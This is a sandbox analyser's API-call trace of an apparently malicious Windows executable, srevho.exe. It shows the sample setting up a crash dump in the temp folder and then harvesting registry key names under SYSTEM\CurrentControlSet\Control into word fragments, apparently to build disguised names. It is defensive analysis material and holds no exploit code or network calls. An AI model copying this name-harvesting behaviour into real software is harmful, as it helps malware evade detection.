# Flog Txt Version 1 # Analyzer Version: 3.2.2 # Analyzer Build Date: Jun 3 2020 08:38:37 # Log Creation Date: 25.06.2020 08:00:15.460 Process: id = "1" image_name = "srevho.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\srevho.exe" page_root = "0x4c07b000" os_pid = "0x754" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x454" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\srevho.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0x620 [0025.631] GetModuleHandleA (lpModuleName=0x0) returned 0x1000000 [0025.631] GetProcessHeap () returned 0x5a0000 [0025.631] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x466c) returned 0x5b4b28 [0025.642] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff5c | out: lpSystemTimeAsFileTime=0x18ff5c*(dwLowDateTime=0xb5f74ec0, dwHighDateTime=0x1d64ac6)) [0025.642] QueryPerformanceFrequency (in: lpFrequency=0x18ff64 | out: lpFrequency=0x18ff64*=100000000) returned 1 [0025.642] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff54 | out: lpPerformanceCount=0x18ff54*=14629877485) returned 1 [0025.642] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x90 [0025.642] GetModuleHandleA (lpModuleName=0x0) returned 0x1000000 [0025.642] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x208) returned 0x5b91a0 [0025.642] GetModuleFileNameW (in: hModule=0x1000000, lpFilename=0x5b91a0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\srevho.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\srevho.exe")) returned 0x30 [0025.642] StrRChrW (lpStart="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\srevho.exe", lpEnd=0x0, wMatch=0x5c) returned="\\srevho.exe" [0025.642] lstrlenW (lpString="srevho.exe") returned 10 [0025.642] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x16) returned 0x5b93b0 [0025.642] PathFindExtensionW (pszPath="srevho.exe") returned=".exe" [0025.643] StrChrW (lpStart="srevho", wMatch=0x3a) returned 0x0 [0025.643] LoadLibraryA (lpLibFileName="DBGHELP.DLL") returned 0x75590000 [0025.866] GetProcAddress (hModule=0x75590000, lpProcName="MiniDumpWriteDump") returned 0x755d5d38 [0025.866] lstrlenW (lpString="srevho") returned 6 [0025.866] ExpandEnvironmentStringsW (in: lpSrc="%temp%\\", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x26 [0025.866] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x62) returned 0x5b93d0 [0025.866] ExpandEnvironmentStringsW (in: lpSrc="%temp%\\", lpDst=0x5b93d0, nSize=0x26 | out: lpDst="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x26 [0025.866] lstrcatW (in: lpString1="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\", lpString2="srevho" | out: lpString1="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\srevho") returned="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\srevho" [0025.867] lstrcatW (in: lpString1="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\srevho", lpString2=".dmp" | out: lpString1="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\srevho.dmp") returned="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\srevho.dmp" [0025.867] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\srevho.dmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\srevho.dmp"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x94 [0025.868] SetFilePointer (in: hFile=0x94, lDistanceToMove=65536, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x10000 [0025.868] SetEndOfFile (hFile=0x94) returned 1 [0025.868] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1001af6) returned 0x0 [0025.868] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Control", phkResult=0x18ff88 | out: phkResult=0x18ff88*=0x98) returned 0x0 [0025.868] RegEnumKeyW (in: hKey=0x98, dwIndex=0x0, lpName=0x18fd58, cchName=0x104 | out: lpName="ACPI") returned 0x0 [0025.869] lstrlenW (lpString="ACPI") returned 4 [0025.869] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x16) returned 0x5b9440 [0025.869] RegEnumKeyW (in: hKey=0x98, dwIndex=0x1, lpName=0x18fd58, cchName=0x104 | out: lpName="AGP") returned 0x0 [0025.869] lstrlenW (lpString="AGP") returned 3 [0025.869] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x14) returned 0x5b9460 [0025.869] RegEnumKeyW (in: hKey=0x98, dwIndex=0x2, lpName=0x18fd58, cchName=0x104 | out: lpName="AppID") returned 0x0 [0025.869] lstrlenW (lpString="AppID") returned 5 [0025.869] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x14) returned 0x5b9480 [0025.869] lstrcmpW (lpString1="agp", lpString2="app") returned -1 [0025.871] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x12) returned 0x5b9620 [0025.871] RegEnumKeyW (in: hKey=0x98, dwIndex=0x3, lpName=0x18fd58, cchName=0x104 | out: lpName="Arbiters") returned 0x0 [0025.871] lstrlenW (lpString="Arbiters") returned 8 [0025.871] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x1e) returned 0x5b40b8 [0025.871] RegEnumKeyW (in: hKey=0x98, dwIndex=0x4, lpName=0x18fd58, cchName=0x104 | out: lpName="BackupRestore") returned 0x0 [0025.871] lstrlenW (lpString="BackupRestore") returned 13 [0025.871] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x1a) returned 0x5b40e0 [0025.871] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x1c) returned 0x5b4108 [0025.871] RegEnumKeyW (in: hKey=0x98, dwIndex=0x5, lpName=0x18fd58, cchName=0x104 | out: lpName="Class") returned 0x0 [0025.871] lstrlenW (lpString="Class") returned 5 [0025.871] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x18) returned 0x5b9640 [0025.871] RegEnumKeyW (in: hKey=0x98, dwIndex=0x6, lpName=0x18fd58, cchName=0x104 | out: lpName="CMF") returned 0x0 [0025.871] lstrlenW (lpString="CMF") returned 3 [0025.872] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x14) returned 0x5b9660 [0025.872] lstrcmpW (lpString1="agp", lpString2="cmf") returned -1 [0025.872] lstrcmpW (lpString1="app", lpString2="cmf") returned -1 [0025.872] RegEnumKeyW (in: hKey=0x98, dwIndex=0x7, lpName=0x18fd58, cchName=0x104 | out: lpName="CoDeviceInstallers") returned 0x0 [0025.872] lstrlenW (lpString="CoDeviceInstallers") returned 18 [0025.872] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x12) returned 0x5b9b20 [0025.872] lstrcmpW (lpString1="id", lpString2="co") returned 1 [0025.872] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x1a) returned 0x5b4130 [0025.872] lstrcmpW (lpString1="backup", lpString2="device") returned -1 [0025.872] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x22) returned 0x5b9b40 [0025.872] RegEnumKeyW (in: hKey=0x98, dwIndex=0x8, lpName=0x18fd58, cchName=0x104 | out: lpName="COM Name Arbiter") returned 0x0 [0025.872] lstrlenW (lpString="COM Name Arbiter") returned 16 [0025.872] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x14) returned 0x5b9b70 [0025.872] lstrcmpW (lpString1="agp", lpString2="com") returned -1 [0025.872] lstrcmpW (lpString1="app", lpString2="com") returned -1 [0025.872] lstrcmpW (lpString1="cmf", lpString2="com") returned -1 [0025.872] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x16) returned 0x5b9b90 [0025.872] lstrcmpW (lpString1="acpi", lpString2="name") returned -1 [0025.872] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x1c) returned 0x5b4158 [0025.872] lstrcmpW (lpString1="restore", lpString2="arbiter") returned 1 [0025.872] RegEnumKeyW (in: hKey=0x98, dwIndex=0x9, lpName=0x18fd58, cchName=0x104 | out: lpName="ComputerName") returned 0x0 [0025.872] lstrlenW (lpString="ComputerName") returned 12 [0025.872] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x1e) returned 0x5b4180 [0025.872] lstrcmpW (lpString1="arbiters", lpString2="computer") returned -1 [0025.872] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x16) returned 0x5b9bb0 [0025.872] lstrcmpW (lpString1="acpi", lpString2="name") returned -1 [0025.872] lstrcmpW (lpString1="name", lpString2="name") returned 0 [0025.872] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b9bb0 | out: hHeap=0x5a0000) returned 1 [0025.872] RegEnumKeyW (in: hKey=0x98, dwIndex=0xa, lpName=0x18fd58, cchName=0x104 | out: lpName="ContentIndex") returned 0x0 [0025.873] lstrlenW (lpString="ContentIndex") returned 12 [0025.873] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x1c) returned 0x5b41a8 [0025.873] lstrcmpW (lpString1="restore", lpString2="content") returned 1 [0025.873] lstrcmpW (lpString1="arbiter", lpString2="content") returned -1 [0025.873] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x18) returned 0x5b9bb0 [0025.873] lstrcmpW (lpString1="class", lpString2="index") returned -1 [0025.873] RegEnumKeyW (in: hKey=0x98, dwIndex=0xb, lpName=0x18fd58, cchName=0x104 | out: lpName="CrashControl") returned 0x0 [0025.873] lstrlenW (lpString="CrashControl") returned 12 [0025.873] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x18) returned 0x5b9bd0 [0025.873] lstrcmpW (lpString1="class", lpString2="crash") returned -1 [0025.873] lstrcmpW (lpString1="index", lpString2="crash") returned 1 [0025.873] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x1c) returned 0x5b41d0 [0025.873] lstrcmpW (lpString1="restore", lpString2="control") returned 1 [0025.873] lstrcmpW (lpString1="arbiter", lpString2="control") returned -1 [0025.873] lstrcmpW (lpString1="content", lpString2="control") returned -1 [0025.873] RegEnumKeyW (in: hKey=0x98, dwIndex=0xc, lpName=0x18fd58, cchName=0x104 | out: lpName="CriticalDeviceDatabase") returned 0x0 [0025.873] lstrlenW (lpString="CriticalDeviceDatabase") returned 22 [0025.873] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x1e) returned 0x5b41f8 [0025.873] lstrcmpW (lpString1="arbiters", lpString2="critical") returned -1 [0025.873] lstrcmpW (lpString1="computer", lpString2="critical") returned -1 [0025.873] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x1a) returned 0x5b4220 [0025.873] lstrcmpW (lpString1="backup", lpString2="device") returned -1 [0025.873] lstrcmpW (lpString1="device", lpString2="device") returned 0 [0025.873] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b4220 | out: hHeap=0x5a0000) returned 1 [0025.873] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x1e) returned 0x5b4220 [0025.873] lstrcmpW (lpString1="arbiters", lpString2="database") returned -1 [0025.873] lstrcmpW (lpString1="computer", lpString2="database") returned -1 [0025.873] lstrcmpW (lpString1="critical", lpString2="database") returned -1 [0025.873] RegEnumKeyW (in: hKey=0x98, dwIndex=0xd, lpName=0x18fd58, cchName=0x104 | out: lpName="Cryptography") returned 0x0 [0025.874] lstrlenW (lpString="Cryptography") returned 12 [0025.874] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x26) returned 0x5b9bf0 [0025.874] RegEnumKeyW (in: hKey=0x98, dwIndex=0xe, lpName=0x18fd58, cchName=0x104 | out: lpName="DeviceClasses") returned 0x0 [0025.874] lstrlenW (lpString="DeviceClasses") returned 13 [0025.874] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x1a) returned 0x5b4248 [0025.874] lstrcmpW (lpString1="backup", lpString2="device") returned -1 [0025.874] lstrcmpW (lpString1="device", lpString2="device") returned 0 [0025.874] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b4248 | out: hHeap=0x5a0000) returned 1 [0025.874] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x1c) returned 0x5b4248 [0025.874] lstrcmpW (lpString1="restore", lpString2="classes") returned 1 [0025.874] lstrcmpW (lpString1="arbiter", lpString2="classes") returned -1 [0025.874] lstrcmpW (lpString1="content", lpString2="classes") returned 1 [0025.874] lstrcmpW (lpString1="control", lpString2="classes") returned 1 [0025.874] RegEnumKeyW (in: hKey=0x98, dwIndex=0xf, lpName=0x18fd58, cchName=0x104 | out: lpName="DeviceOverrides") returned 0x0 [0025.874] lstrlenW (lpString="DeviceOverrides") returned 15 [0025.874] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x1a) returned 0x5b4270 [0025.874] lstrcmpW (lpString1="backup", lpString2="device") returned -1 [0025.874] lstrcmpW (lpString1="device", lpString2="device") returned 0 [0025.874] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b4270 | out: hHeap=0x5a0000) returned 1 [0025.874] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5b4270 [0025.874] RegEnumKeyW (in: hKey=0x98, dwIndex=0x10, lpName=0x18fd58, cchName=0x104 | out: lpName="Diagnostics") returned 0x0 [0025.874] lstrlenW (lpString="Diagnostics") returned 11 [0025.874] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x24) returned 0x5b9c20 [0025.874] RegEnumKeyW (in: hKey=0x98, dwIndex=0x11, lpName=0x18fd58, cchName=0x104 | out: lpName="Els") returned 0x0 [0025.874] lstrlenW (lpString="Els") returned 3 [0025.874] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x14) returned 0x5b9c68 [0025.875] lstrcmpW (lpString1="agp", lpString2="els") returned -1 [0025.875] lstrcmpW (lpString1="app", lpString2="els") returned -1 [0025.875] lstrcmpW (lpString1="cmf", lpString2="els") returned -1 [0025.875] lstrcmpW (lpString1="com", lpString2="els") returned -1 [0025.875] RegEnumKeyW (in: hKey=0x98, dwIndex=0x12, lpName=0x18fd58, cchName=0x104 | out: lpName="Errata") returned 0x0 [0025.875] lstrlenW (lpString="Errata") returned 6 [0025.875] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x1a) returned 0x5b4298 [0025.875] lstrcmpW (lpString1="backup", lpString2="errata") returned -1 [0025.875] lstrcmpW (lpString1="device", lpString2="errata") returned -1 [0025.875] RegEnumKeyW (in: hKey=0x98, dwIndex=0x13, lpName=0x18fd58, cchName=0x104 | out: lpName="FileSystem") returned 0x0 [0025.875] lstrlenW (lpString="FileSystem") returned 10 [0025.875] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x16) returned 0x5b9c88 [0025.875] lstrcmpW (lpString1="acpi", lpString2="file") returned -1 [0025.875] lstrcmpW (lpString1="name", lpString2="file") returned 1 [0025.875] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x1a) returned 0x5b42c0 [0025.875] lstrcmpW (lpString1="backup", lpString2="system") returned -1 [0025.875] lstrcmpW (lpString1="device", lpString2="system") returned -1 [0025.875] lstrcmpW (lpString1="errata", lpString2="system") returned -1 [0025.875] RegEnumKeyW (in: hKey=0x98, dwIndex=0x14, lpName=0x18fd58, cchName=0x104 | out: lpName="FileSystemUtilities") returned 0x0 [0025.875] lstrlenW (lpString="FileSystemUtilities") returned 19 [0025.875] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x16) returned 0x5b9ca8 [0025.876] lstrcmpW (lpString1="acpi", lpString2="file") returned -1 [0025.876] lstrcmpW (lpString1="name", lpString2="file") returned 1 [0025.876] lstrcmpW (lpString1="file", lpString2="file") returned 0 [0025.876] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b9ca8 | out: hHeap=0x5a0000) returned 1 [0025.876] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x1a) returned 0x5b42e8 [0025.876] lstrcmpW (lpString1="backup", lpString2="system") returned -1 [0025.876] lstrcmpW (lpString1="device", lpString2="system") returned -1 [0025.876] lstrcmpW (lpString1="errata", lpString2="system") returned -1 [0025.876] lstrcmpW (lpString1="system", lpString2="system") returned 0 [0025.876] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b42e8 | out: hHeap=0x5a0000) returned 1 [0025.876] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5b42e8 [0025.876] lstrcmpW (lpString1="overrides", lpString2="utilities") returned -1 [0025.876] RegEnumKeyW (in: hKey=0x98, dwIndex=0x15, lpName=0x18fd58, cchName=0x104 | out: lpName="GraphicsDrivers") returned 0x0 [0025.876] lstrlenW (lpString="GraphicsDrivers") returned 15 [0025.876] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x1e) returned 0x5b4310 [0025.876] lstrcmpW (lpString1="arbiters", lpString2="graphics") returned -1 [0025.876] lstrcmpW (lpString1="computer", lpString2="graphics") returned -1 [0025.876] lstrcmpW (lpString1="critical", lpString2="graphics") returned -1 [0025.876] lstrcmpW (lpString1="database", lpString2="graphics") returned -1 [0025.876] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x1c) returned 0x5b4338 [0025.876] lstrcmpW (lpString1="restore", lpString2="drivers") returned 1 [0025.876] lstrcmpW (lpString1="arbiter", lpString2="drivers") returned -1 [0025.876] lstrcmpW (lpString1="content", lpString2="drivers") returned -1 [0025.876] lstrcmpW (lpString1="control", lpString2="drivers") returned -1 [0025.876] lstrcmpW (lpString1="classes", lpString2="drivers") returned -1 [0025.876] RegEnumKeyW (in: hKey=0x98, dwIndex=0x16, lpName=0x18fd58, cchName=0x104 | out: lpName="GroupOrderList") returned 0x0 [0025.876] lstrlenW (lpString="GroupOrderList") returned 14 [0025.876] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x18) returned 0x5b9ca8 [0025.876] lstrcmpW (lpString1="class", lpString2="group") returned -1 [0025.876] lstrcmpW (lpString1="index", lpString2="group") returned 1 [0025.876] lstrcmpW (lpString1="crash", lpString2="group") returned -1 [0025.876] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x18) returned 0x5b9cc8 [0025.877] lstrcmpW (lpString1="class", lpString2="order") returned -1 [0025.877] lstrcmpW (lpString1="index", lpString2="order") returned -1 [0025.877] lstrcmpW (lpString1="crash", lpString2="order") returned -1 [0025.877] lstrcmpW (lpString1="group", lpString2="order") returned -1 [0025.877] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x16) returned 0x5b9ce8 [0025.877] lstrcmpW (lpString1="acpi", lpString2="list") returned -1 [0025.877] lstrcmpW (lpString1="name", lpString2="list") returned 1 [0025.877] lstrcmpW (lpString1="file", lpString2="list") returned -1 [0025.877] RegEnumKeyW (in: hKey=0x98, dwIndex=0x17, lpName=0x18fd58, cchName=0x104 | out: lpName="HAL") returned 0x0 [0025.877] lstrlenW (lpString="HAL") returned 3 [0025.877] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x14) returned 0x5b9d08 [0025.877] lstrcmpW (lpString1="agp", lpString2="hal") returned -1 [0025.877] lstrcmpW (lpString1="app", lpString2="hal") returned -1 [0025.877] lstrcmpW (lpString1="cmf", lpString2="hal") returned -1 [0025.877] lstrcmpW (lpString1="com", lpString2="hal") returned -1 [0025.877] lstrcmpW (lpString1="els", lpString2="hal") returned -1 [0025.877] RegEnumKeyW (in: hKey=0x98, dwIndex=0x18, lpName=0x18fd58, cchName=0x104 | out: lpName="IDConfigDB") returned 0x0 [0025.877] lstrlenW (lpString="IDConfigDB") returned 10 [0025.877] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x1e) returned 0x5b4360 [0025.877] lstrcmpW (lpString1="arbiters", lpString2="idconfig") returned -1 [0025.877] lstrcmpW (lpString1="computer", lpString2="idconfig") returned -1 [0025.877] lstrcmpW (lpString1="critical", lpString2="idconfig") returned -1 [0025.877] lstrcmpW (lpString1="database", lpString2="idconfig") returned -1 [0025.877] lstrcmpW (lpString1="graphics", lpString2="idconfig") returned -1 [0025.877] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x12) returned 0x5b9d28 [0025.877] lstrcmpW (lpString1="id", lpString2="db") returned 1 [0025.877] lstrcmpW (lpString1="co", lpString2="db") returned -1 [0025.877] RegEnumKeyW (in: hKey=0x98, dwIndex=0x19, lpName=0x18fd58, cchName=0x104 | out: lpName="Keyboard Layout") returned 0x0 [0025.877] lstrlenW (lpString="Keyboard Layout") returned 15 [0025.877] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x1e) returned 0x5b4388 [0025.877] lstrcmpW (lpString1="arbiters", lpString2="keyboard") returned -1 [0025.878] lstrcmpW (lpString1="computer", lpString2="keyboard") returned -1 [0025.878] lstrcmpW (lpString1="critical", lpString2="keyboard") returned -1 [0025.878] lstrcmpW (lpString1="database", lpString2="keyboard") returned -1 [0025.878] lstrcmpW (lpString1="graphics", lpString2="keyboard") returned -1 [0025.878] lstrcmpW (lpString1="idconfig", lpString2="keyboard") returned -1 [0025.878] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x1a) returned 0x5b43b0 [0025.878] lstrcmpW (lpString1="backup", lpString2="layout") returned -1 [0025.878] lstrcmpW (lpString1="device", lpString2="layout") returned -1 [0025.878] lstrcmpW (lpString1="errata", lpString2="layout") returned -1 [0025.878] lstrcmpW (lpString1="system", lpString2="layout") returned 1 [0025.878] RegEnumKeyW (in: hKey=0x98, dwIndex=0x1a, lpName=0x18fd58, cchName=0x104 | out: lpName="Keyboard Layouts") returned 0x0 [0025.878] lstrlenW (lpString="Keyboard Layouts") returned 16 [0025.878] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x1e) returned 0x5b43d8 [0025.878] lstrcmpW (lpString1="arbiters", lpString2="keyboard") returned -1 [0025.878] lstrcmpW (lpString1="computer", lpString2="keyboard") returned -1 [0025.878] lstrcmpW (lpString1="critical", lpString2="keyboard") returned -1 [0025.878] lstrcmpW (lpString1="database", lpString2="keyboard") returned -1 [0025.878] lstrcmpW (lpString1="graphics", lpString2="keyboard") returned -1 [0025.878] lstrcmpW (lpString1="idconfig", lpString2="keyboard") returned -1 [0025.878] lstrcmpW (lpString1="keyboard", lpString2="keyboard") returned 0 [0025.878] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b43d8 | out: hHeap=0x5a0000) returned 1 [0025.878] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x1c) returned 0x5b43d8 [0025.878] lstrcmpW (lpString1="restore", lpString2="layouts") returned 1 [0025.878] lstrcmpW (lpString1="arbiter", lpString2="layouts") returned -1 [0025.878] lstrcmpW (lpString1="content", lpString2="layouts") returned -1 [0025.878] lstrcmpW (lpString1="control", lpString2="layouts") returned -1 [0025.878] lstrcmpW (lpString1="classes", lpString2="layouts") returned -1 [0025.878] lstrcmpW (lpString1="drivers", lpString2="layouts") returned -1 [0025.878] RegEnumKeyW (in: hKey=0x98, dwIndex=0x1b, lpName=0x18fd58, cchName=0x104 | out: lpName="Lsa") returned 0x0 [0025.878] lstrlenW (lpString="Lsa") returned 3 [0025.878] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x14) returned 0x5b9d48 [0025.878] lstrcmpW (lpString1="agp", lpString2="lsa") returned -1 [0025.878] lstrcmpW (lpString1="app", lpString2="lsa") returned -1 [0025.878] lstrcmpW (lpString1="cmf", lpString2="lsa") returned -1 [0025.879] lstrcmpW (lpString1="com", lpString2="lsa") returned -1 [0025.879] lstrcmpW (lpString1="els", lpString2="lsa") returned -1 [0025.879] lstrcmpW (lpString1="hal", lpString2="lsa") returned -1 [0025.879] RegEnumKeyW (in: hKey=0x98, dwIndex=0x1c, lpName=0x18fd58, cchName=0x104 | out: lpName="LsaExtensionConfig") returned 0x0 [0025.879] lstrlenW (lpString="LsaExtensionConfig") returned 18 [0025.879] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x14) returned 0x5b9d68 [0025.879] lstrcmpW (lpString1="agp", lpString2="lsa") returned -1 [0025.879] lstrcmpW (lpString1="app", lpString2="lsa") returned -1 [0025.879] lstrcmpW (lpString1="cmf", lpString2="lsa") returned -1 [0025.879] lstrcmpW (lpString1="com", lpString2="lsa") returned -1 [0025.879] lstrcmpW (lpString1="els", lpString2="lsa") returned -1 [0025.879] lstrcmpW (lpString1="hal", lpString2="lsa") returned -1 [0025.879] lstrcmpW (lpString1="lsa", lpString2="lsa") returned 0 [0025.879] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b9d68 | out: hHeap=0x5a0000) returned 1 [0025.879] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5b4400 [0025.879] lstrcmpW (lpString1="overrides", lpString2="extension") returned 1 [0025.879] lstrcmpW (lpString1="utilities", lpString2="extension") returned 1 [0025.879] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x1a) returned 0x5b4428 [0025.879] lstrcmpW (lpString1="backup", lpString2="config") returned -1 [0025.879] lstrcmpW (lpString1="device", lpString2="config") returned 1 [0025.879] lstrcmpW (lpString1="errata", lpString2="config") returned 1 [0025.879] lstrcmpW (lpString1="system", lpString2="config") returned 1 [0025.879] lstrcmpW (lpString1="layout", lpString2="config") returned 1 [0025.879] RegEnumKeyW (in: hKey=0x98, dwIndex=0x1d, lpName=0x18fd58, cchName=0x104 | out: lpName="LsaInformation") returned 0x0 [0025.879] lstrlenW (lpString="LsaInformation") returned 14 [0025.879] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x14) returned 0x5b9d68 [0025.879] lstrcmpW (lpString1="agp", lpString2="lsa") returned -1 [0025.879] lstrcmpW (lpString1="app", lpString2="lsa") returned -1 [0025.879] lstrcmpW (lpString1="cmf", lpString2="lsa") returned -1 [0025.879] lstrcmpW (lpString1="com", lpString2="lsa") returned -1 [0025.879] lstrcmpW (lpString1="els", lpString2="lsa") returned -1 [0025.879] lstrcmpW (lpString1="hal", lpString2="lsa") returned -1 [0025.879] lstrcmpW (lpString1="lsa", lpString2="lsa") returned 0 [0025.880] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b9d68 | out: hHeap=0x5a0000) returned 1 [0025.880] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x24) returned 0x5ba450 [0025.880] lstrcmpW (lpString1="diagnostics", lpString2="information") returned -1 [0025.880] RegEnumKeyW (in: hKey=0x98, dwIndex=0x1e, lpName=0x18fd58, cchName=0x104 | out: lpName="MediaCategories") returned 0x0 [0025.880] lstrlenW (lpString="MediaCategories") returned 15 [0025.880] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x18) returned 0x5b9d68 [0025.880] lstrcmpW (lpString1="class", lpString2="media") returned -1 [0025.880] lstrcmpW (lpString1="index", lpString2="media") returned -1 [0025.880] lstrcmpW (lpString1="crash", lpString2="media") returned -1 [0025.880] lstrcmpW (lpString1="group", lpString2="media") returned -1 [0025.880] lstrcmpW (lpString1="order", lpString2="media") returned 1 [0025.880] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x22) returned 0x5ba480 [0025.880] lstrcmpW (lpString1="installers", lpString2="categories") returned 1 [0025.880] RegEnumKeyW (in: hKey=0x98, dwIndex=0x1f, lpName=0x18fd58, cchName=0x104 | out: lpName="MediaDRM") returned 0x0 [0025.880] lstrlenW (lpString="MediaDRM") returned 8 [0025.880] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x18) returned 0x5b9d88 [0025.880] lstrcmpW (lpString1="class", lpString2="media") returned -1 